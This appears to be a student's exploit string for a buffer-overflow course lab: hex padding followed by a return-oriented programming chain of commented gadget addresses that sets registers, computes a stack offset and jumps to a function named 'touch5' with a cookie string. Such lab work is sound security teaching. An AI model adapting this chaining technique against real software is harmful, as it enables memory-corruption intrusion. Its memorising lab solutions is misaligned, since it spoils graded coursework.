00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 90 90 90 90 90 
13 1b 40 00 00 00 00 00 /* set rsp to rax */ 
5c 1a 40 00 00 00 00 00 /* set rdi to rax */
64 1a 40 00 00 00 00 00 /* pop next value into rax */
48 00 00 00 00 00 00 00 /* this is rax's value. rax = 40 */
b9 1a 40 00 00 00 00 00 /* move rax into rdx */
cc 1a 40 00 00 00 00 00 /* move rdx into rcx */
da 1a 40 00 00 00 00 00 /* move rcx into rdi */
97 1a 40 00 00 00 00 00 /* add rdi and rsi, answer goes in rax */
5c 1a 40 00 00 00 00 00 /* set rdi to rax again */
bd 19 40 00 00 00 00 00 /* address of touch5 */
34 32 33 32 32 33 37 33 
00
